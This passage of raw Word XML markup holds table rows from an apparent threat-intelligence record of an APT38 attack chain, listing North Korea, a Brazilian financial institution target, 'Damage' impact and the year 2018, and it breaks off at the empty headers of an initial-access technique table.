          <w:p w14:paraId="0C867B7E" w14:textId="466C137F" w:rsidR="0042549C" w:rsidRPr="007328DE" w:rsidRDefault="00BD6C52" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>North Korea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E3C3F28" w14:textId="77777777" w:rsidR="0042549C" w:rsidRPr="00387DCC" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0042549C" w:rsidRPr="00B857D7" w14:paraId="059C5E9F" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7295428E" w14:textId="77777777" w:rsidR="0042549C" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6327430F" w14:textId="155FC14D" w:rsidR="0042549C" w:rsidRDefault="00FB12EF" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Brazil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="744491DA" w14:textId="77777777" w:rsidR="0042549C" w:rsidRPr="00387DCC" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0042549C" w:rsidRPr="00B857D7" w14:paraId="1907F802" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AE6A824" w14:textId="77777777" w:rsidR="0042549C" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DCD57A0" w14:textId="35AD845D" w:rsidR="0042549C" w:rsidRDefault="00FB12EF" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Financial Institution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29A77A34" w14:textId="77777777" w:rsidR="0042549C" w:rsidRPr="00387DCC" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0042549C" w:rsidRPr="00B857D7" w14:paraId="71A847B6" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61C21368" w14:textId="77777777" w:rsidR="0042549C" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D6F5CD6" w14:textId="28C88519" w:rsidR="0042549C" w:rsidRDefault="00FB12EF" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Damage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="644978B3" w14:textId="77777777" w:rsidR="0042549C" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0042549C" w:rsidRPr="00B857D7" w14:paraId="7509D1F5" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FD40567" w14:textId="77777777" w:rsidR="0042549C" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63E03D06" w14:textId="292A1784" w:rsidR="0042549C" w:rsidRDefault="00FB12EF" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C91EBA5" w14:textId="780B13EC" w:rsidR="0042549C" w:rsidRDefault="00BD6C52" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0042549C" w:rsidRPr="00B857D7" w14:paraId="53F18082" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14C8ACFA" w14:textId="77777777" w:rsidR="0042549C" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71A0A7CB" w14:textId="579A5B77" w:rsidR="0042549C" w:rsidRDefault="00FB12EF" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B5200B2" w14:textId="77777777" w:rsidR="0042549C" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00873778" w:rsidRPr="00B857D7" w14:paraId="5E25C5BC" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="344869A1" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="590924DF" w14:textId="0EBEB4FC" w:rsidR="00873778" w:rsidRDefault="00FB12EF" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ED8619E"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11CEE2E2" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A1FA73E" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B5FEF95" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A76FCDA" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0042549C" w:rsidRPr="00B857D7" w14:paraId="6C009770" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72DBDEE1" w14:textId="35148B45" w:rsidR="0042549C" w:rsidRDefault="00873778" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78024DE7" w14:textId="1BAF16A0" w:rsidR="0042549C" w:rsidRDefault="00FB12EF" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B7393FA" w14:textId="77777777" w:rsidR="0042549C" w:rsidRDefault="0042549C" w:rsidP="003E66BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DBE97AD" w14:textId="77777777" w:rsidR="0042549C" w:rsidRPr="00AC7A85" w:rsidRDefault="0042549C" w:rsidP="0042549C"/>
    <w:p w14:paraId="43CDA895" w14:textId="77777777" w:rsidR="0042549C" w:rsidRDefault="0042549C" w:rsidP="0042549C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc110935518"/>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10343" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="498"/>
        <w:gridCol w:w="1882"/>
        <w:gridCol w:w="2632"/>
        <w:gridCol w:w="663"/>
        <w:gridCol w:w="648"/>
        <w:gridCol w:w="618"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="2410"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w14:paraId="1C9AD626" w14:textId="77777777" w:rsidTr="009E7DBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="49D2D0C9" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="17C7D92C" w14:textId="09B397CA" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="68E31D89" w14:textId="2A84BA4F" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>APT38_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2CC76BDD" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5468127D" w14:textId="6D36BB68" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0EE0DEF7" w14:textId="72755E70" w:rsidR="009E7DBF" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6BF10595" w14:textId="221E02B5" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="187005CA" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w14:paraId="6437AC39" w14:textId="77777777" w:rsidTr="009E7DBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="326E4B2E" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B163962" w14:textId="63EA6695" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EA44CAE" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01184039" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="575972AB" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ACF8E81" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="201E6E3A" w14:textId="71FE1098" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A7777B1" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w14:paraId="4678C7B4" w14:textId="77777777" w:rsidTr="009E7DBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22FED413" w14:textId="55A23C07" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="87" w:name="OLE_LINK27"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidR="00007B95">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43C922C9" w14:textId="1C19C09C" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16485DE0" w14:textId="77777777" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="622AF2DE" w14:textId="7DD6AB33" w:rsidR="009E7DBF" w:rsidRPr="002D1D50" w:rsidRDefault="009E7DBF" w:rsidP="009E7DBF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
